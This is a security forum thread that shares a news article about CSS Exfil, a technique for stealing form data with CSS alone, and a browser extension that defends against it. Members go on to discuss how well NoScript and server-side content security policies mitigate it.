Protect yourself against a pure CSS data stealing attack called Exfil

shmu26

shmu26

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
Content source
https://www.ghacks.net/2019/04/02/protect-yourself-against-a-pure-css-data-stealing-attack-called-exfil/
CSS Exfil Protection is a browser extension for Mozilla Firefox and Google Chrome that protects data against CSS Exfil attacks.

Internet users who have a good understanding of online security know that JavaScript is a great technology but also something that can be used in attacks. There are plenty of solutions available to deal with JavaScript-based attacks including using content blockers like uBlock Origin, extensions like NoScript that block JavaScript executions, or disabling JavaScript outright (the latter is not very practical).

An attack, named CSS Exfil (from exfiltrate), uses CSS to steal data. Mike Gualtieri, the researcher who discovered the vulnerability, published several proof of concept attacks designed to steal usernames, passwords, and other data on web pages it is used on.

Mike Gualtieri created a vulnerability tester that returns whether the web browser is vulnerable to CSS Exfil attacks. Just visit the web page in question to see if the browser is vulnerable or not. The page is just testing the vulnerability but not abusing it in any way.

What makes the attack particularly problematic is that it does not rely on JavaScript and that browsers don't offer any form of protection against it.


www.ghacks.net

Protect yourself against a pure CSS data stealing attack called Exfil - gHacks Tech News

CSS Exfil Protection is a browser extension for Mozilla Firefox and Google Chrome that protects data against CSS Exfil attacks.
www.ghacks.net
 
  • Like
Reactions: Rebsat, oldschool, Dave Russo and 7 others
shmu26

shmu26

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
HarborFront said:
Add more extensions and some people will disagree.

Anyway, I have this extension protecting my browsers.....you know my having more extensions style
Click to expand...
This one says it is offering a unique protection, although I haven't heard much about this type of attack. Anyone?
 
  • Like
Reactions: oldschool
L

Local Host

shmu26 said:
This one says it is offering a unique protection, although I haven't heard much about this type of attack. Anyone?
Click to expand...
This attack vector was actually discovered last year.

Using CSP will patch this exploit server side, but most website designers are either lazy or lack the knowledge to do so (there lots of webmasters that don't even what CSP is, leave alone implement it).

Client side is a different history, the browser itself needs to block remote URLs.

You can find detailed information here, Stealing Data With CSS: Attack and Defense
 
  • Like
Reactions: oldschool, Handsome Recluse, harlan4096 and 1 other person
TairikuOkami

TairikuOkami

Level 35
Verified
Top Poster
Content Creator
Well-known
May 13, 2017
2,479
So the webpage has to be exploited first in order to be able to exploit the user. :unsure:

Utilize an injection flaw to add a fake password input into the page and use CSS Exfil to steal password.
Click to expand...
I guess only if the password is saved within the browser or if there is password autofill involved?
 
  • Like
Reactions: oldschool, harlan4096 and shmu26
Moonhorse

Moonhorse

Level 37
Verified
Top Poster
Content Creator
Well-known
May 29, 2018
2,605
I added this extension to chrome and visited some sites in hopes of getting alert by extension...oh well

I have noscript + ublock origin in basilisk browser and noscript will prevent this attack anyways
 
  • Like
Reactions: oldschool
A

Azure

Level 28
Verified
Top Poster
Content Creator
Oct 23, 2014
1,712
Moonhorse said:
I added this extension to chrome and visited some sites in hopes of getting alert by extension...oh well

I have noscript + ublock origin in basilisk browser and noscript will prevent this attack anyways
Click to expand...
Are you sure?
 
  • Like
Reactions: shmu26
Moonhorse

Moonhorse

Level 37
Verified
Top Poster
Content Creator
Well-known
May 29, 2018
2,605
Azure said:
Are you sure?
Click to expand...
shmu26 said:
There are plenty of solutions available to deal with JavaScript-based attacks including using content blockers like uBlock Origin, extensions like NoScript that block JavaScript executions, or disabling JavaScript outright
Click to expand...

NoScript Security Suite is a browser extension for the Firefox web browser designed to give users control over the content that sites may run. The extension blocks JavaScript execution by default which improves security and privacy significantly. NoScript supports other features, XSS and clickjacking attack protections and other security enhancing features.


Noscript or umatrix are great extensions, probably even ublock origin will do on medium/hard mode
 
  • Like
Reactions: harlan4096
shmu26

shmu26

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
Moonhorse said:
NoScript Security Suite is a browser extension for the Firefox web browser designed to give users control over the content that sites may run. The extension blocks JavaScript execution by default which improves security and privacy significantly. NoScript supports other features, XSS and clickjacking attack protections and other security enhancing features.


Noscript or umatrix are great extensions, probably even ublock origin will do on medium/hard mode
Click to expand...
Maybe you missed this line in the article:
What makes the attack particularly problematic is that it does not rely on JavaScript
 
  • Like
  • Thanks
Reactions: Azure, Moonhorse and harlan4096
You must log in or register to reply here.

Similar threads

vtqhtr413
    • Like
    • +Reputation
Security News AutoSpill attack steals credentials from Android password managers
Replies
3
Views
1,436
Security News
vtqhtr413
vtqhtr413
[correlate]
    • +Reputation
    • Like
Gamaredon hackers start stealing data 30 minutes after a breach
Replies
0
Views
765
News Archive
[correlate]
[correlate]
CyberTech
    • +Reputation
    • Like
Atlassian warns of exploit for Confluence data wiping bug, get patching
Replies
0
Views
637
News Archive
CyberTech
CyberTech

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top